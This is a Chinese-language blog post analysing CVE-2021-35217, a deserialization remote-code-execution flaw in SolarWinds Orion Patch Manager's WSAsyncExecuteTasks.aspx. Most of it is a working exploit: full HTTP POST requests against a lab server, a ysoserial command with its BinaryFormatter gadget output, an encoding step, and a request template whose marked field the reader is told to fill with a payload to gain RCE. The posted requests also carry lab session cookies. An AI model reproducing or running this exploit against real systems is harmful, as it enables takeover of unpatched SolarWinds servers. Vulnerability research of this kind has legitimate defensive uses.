警告
本文最后更新于 2021-10-23,文中内容可能已过时。
继推特@testanull的研究文章,分析另一个RCE CVE-2021–35217。
漏洞位置出现在 http://192.168.137.130:8787/Orion/PM/Controls/WSAsyncExecuteTasks.aspx
在OnInit()初始化时,从request中反序列化出JSONData传递给ExecuteItem()方法。
跟进ExecuteItem()方法
123行到138行从JSONData中取ServerControlDefinition,用|
,=
分割放入var parameters = new Dictionary<String, String>();
这个字符串类型的键值对。
140行从parameters中取Control值加载控件,那么控件值可控。141行判断控件对象是否是ScmResourceBaseAsync类型,不是的话154行直接return。
那么先找ScmResourceBaseAsync类型的控件。
我用的是~/Orion/PM/Controls/Update/GroupsMissingUpdateCtrl.ascx
此时构造请求
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| POST /Orion/PM/Controls/WSAsyncExecuteTasks.aspx HTTP/1.1
Host: 192.168.137.130:8787
Content-Length: 3370
Cache-Control: max-age=0
Origin: http://192.168.137.130:8787
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.137.130:8787/Orion/PM/Controls/WSAsyncExecuteTasks.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: __AntiXsrfToken=49d368c51e2b4bffbbeae1904e825850; Orion_IsSessionExp=TRUE; ASP.NET_SessionId=3iel4j1s0uuvy3n0dkpugw30; .ASPXAUTH=B57BE373D7D9F57BE66003BCBCD663097E6FD5979FA91CA0965925EF9F662DFAB27DBB05B583F996018A5F7D78F2C6A2359918791EE44E7DACF4031FAB5E393924CB249702AED0D100289B94588277792D5C27B5C4E3089926CA43FD2733491A66D224CFF83D7803E25CF52EAEC35C2723BAD30A762E1EBA62543BFB203B6E5B3CAC97CCBF32C724994B67E47320F56FC2498C105BB89DE7917FE3923401C0B86C6B1A8ACB583A763D89344AA7561E1F; XSRF-TOKEN=gHBB9ZU1MA4DQazR0Fburx9Yjf05BEMOTYPUmxGLL1s=
Connection: close
[{"ResourceId":null,"Hash":null,"ServerMethod":null,"ServerControlDefinition":"Control=~/Orion/PM/Controls/Update/GroupsMissingUpdateCtrl.ascx|config.ParametersSerial=test|config.PreLoadMethodSerial=test;test","Parameters":[]}]
|
SolarWinds.PM.Web.dll!SolarWinds.PM.Web.Resources.ScmResourceBaseAsync.OnLoad(System.EventArgs e)
断点之后
发现如果PreLoadMethodSerial不为空就会进入反序列化
而反序列化更是直接使用了BinaryFormatter,所以直接可以RCE。
1
2
| C:\Users\admin\Downloads\ysoserial-1.34\Release>ysoserial.exe -f binaryformatter -g SessionSecurityToken -c "ping localhost -t"
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uSWRlbnRpdHlNb2RlbCwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAADBTeXN0ZW0uSWRlbnRpdHlNb2RlbC5Ub2tlbnMuU2Vzc2lvblNlY3VyaXR5VG9rZW4BAAAADFNlc3Npb25Ub2tlbgcCAgAAAAkDAAAADwMAAADRBQAAAkAUU2VjdXJpdHlDb250ZXh0VG9rZW5AB1ZlcnNpb26DQBlTZWN1cmVDb252ZXJzYXRpb25WZXJzaW9umShodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzAyL3NjQAJJZINACUNvbnRleHRJZINAA0tleZ8BAUANRWZmZWN0aXZlVGltZYNACkV4cGlyeVRpbWWDQBBLZXlFZmZlY3RpdmVUaW1lg0ANS2V5RXhwaXJ5VGltZYNAD0NsYWltc1ByaW5jaXBhbEAKSWRlbnRpdGllc0AISWRlbnRpdHlADkJvb3RTdHJhcFRva2VumtQEQUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFGNU5hV055YjNOdlpuUXVVRzkzWlhKVGFHVnNiQzVGWkdsMGIzSXNJRlpsY25OcGIyNDlNeTR3TGpBdU1Dd2dRM1ZzZEhWeVpUMXVaWFYwY21Gc0xDQlFkV0pzYVdOTFpYbFViMnRsYmowek1XSm1NemcxTm1Ga016WTBaVE0xQlFFQUFBQkNUV2xqY205emIyWjBMbFpwYzNWaGJGTjBkV1JwYnk1VVpYaDBMa1p2Y20xaGRIUnBibWN1VkdWNGRFWnZjbTFoZEhScGJtZFNkVzVRY205d1pYSjBhV1Z6QVFBQUFBOUdiM0psWjNKdmRXNWtRbkoxYzJnQkFnQUFBQVlEQUFBQXZ3VThQM2h0YkNCMlpYSnphVzl1UFNJeExqQWlJR1Z1WTI5a2FXNW5QU0oxZEdZdE9DSS9QZzBLUEU5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2lCTlpYUm9iMlJPWVcxbFBTSlRkR0Z5ZENJZ1NYTkpibWwwYVdGc1RHOWhaRVZ1WVdKc1pXUTlJa1poYkhObElpQjRiV3h1Y3owaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3dmNISmxjMlZ1ZEdGMGFXOXVJaUI0Yld4dWN6cHpaRDBpWTJ4eUxXNWhiV1Z6Y0dGalpUcFRlWE4wWlcwdVJHbGhaMjV2YzNScFkzTTdZWE56WlcxaWJIazlVM2x6ZEdWdElpQjRiV3h1Y3pwNFBTSm9kSFJ3T2k4dmMyTm9aVzFoY3k1dGFXTnliM052Wm5RdVkyOXRMM2RwYm1aNEx6SXdNRFl2ZUdGdGJDSStEUW9nSUR4UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJdVQySnFaV04wU1c1emRHRnVZMlUrRFFvZ0lDQWdQSE5rT2xCeWIyTmxjM00rRFFvZ0lDQWdJQ0E4YzJRNlVISnZZMlZ6Y3k1VGRHRnlkRWx1Wm04K0RRb2dJQ0FnSUNBZ0lEeHpaRHBRY205alpYTnpVM1JoY25SSmJtWnZJRUZ5WjNWdFpXNTBjejBpTDJNZ2NHbHVaeUJzYjJOaGJHaHZjM1FnTFhRaUlGTjBZVzVrWVhKa1JYSnliM0pGYm1OdlpHbHVaejBpZTNnNlRuVnNiSDBpSUZOMFlXNWtZWEprVDNWMGNIVjBSVzVqYjJScGJtYzlJbnQ0T2s1MWJHeDlJaUJWYzJWeVRtRnRaVDBpSWlCUVlYTnpkMjl5WkQwaWUzZzZUblZzYkgwaUlFUnZiV0ZwYmowaUlpQk1iMkZrVlhObGNsQnliMlpwYkdVOUlrWmhiSE5sSWlCR2FXeGxUbUZ0WlQwaVkyMWtJaUF2UGcwS0lDQWdJQ0FnUEM5elpEcFFjbTlqWlhOekxsTjBZWEowU1c1bWJ6NE5DaUFnSUNBOEwzTmtPbEJ5YjJObGMzTStEUW9nSUR3dlQySnFaV04wUkdGMFlWQnliM1pwWkdWeUxrOWlhbVZqZEVsdWMzUmhibU5sUGcwS1BDOVBZbXBsWTNSRVlYUmhVSEp2ZG1sa1pYSStDdz09AQEBAQEL
|
编码一下
1
| Response.Write(HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes("AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uSWRlbnRpdHlNb2RlbCwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRv...QEL")));
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| POST /Orion/PM/Controls/WSAsyncExecuteTasks.aspx HTTP/1.1
Host: 192.168.137.130:8787
Content-Length: 3370
Cache-Control: max-age=0
Origin: http://192.168.137.130:8787
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.137.130:8787/Orion/PM/Controls/WSAsyncExecuteTasks.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: __AntiXsrfToken=49d368c51e2b4bffbbeae1904e825850; Orion_IsSessionExp=TRUE; ASP.NET_SessionId=3iel4j1s0uuvy3n0dkpugw30; .ASPXAUTH=B57BE373D7D9F57BE66003BCBCD663097E6FD5979FA91CA0965925EF9F662DFAB27DBB05B583F996018A5F7D78F2C6A2359918791EE44E7DACF4031FAB5E393924CB249702AED0D100289B94588277792D5C27B5C4E3089926CA43FD2733491A66D224CFF83D7803E25CF52EAEC35C2723BAD30A762E1EBA62543BFB203B6E5B3CAC97CCBF32C724994B67E47320F56FC2498C105BB89DE7917FE3923401C0B86C6B1A8ACB583A763D89344AA7561E1F; XSRF-TOKEN=gHBB9ZU1MA4DQazR0Fburx9Yjf05BEMOTYPUmxGLL1s=
Connection: close
[{"ResourceId":null,"Hash":null,"ServerMethod":null,"ServerControlDefinition":"Control=~/Orion/PM/Controls/Update/GroupsMissingUpdateCtrl.ascx|config.ParametersSerial=HERE IS YOUR PAYLOAD|config.PreLoadMethodSerial=SolarWinds.Orion.Core.Models.Actions.Contexts.AlertingActionContext, SolarWinds.Orion.Actions.Models;asd","Parameters":[]}]
|
替换HERE IS YOUR PAYLOAD
为你的payload,然后就RCE了。
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。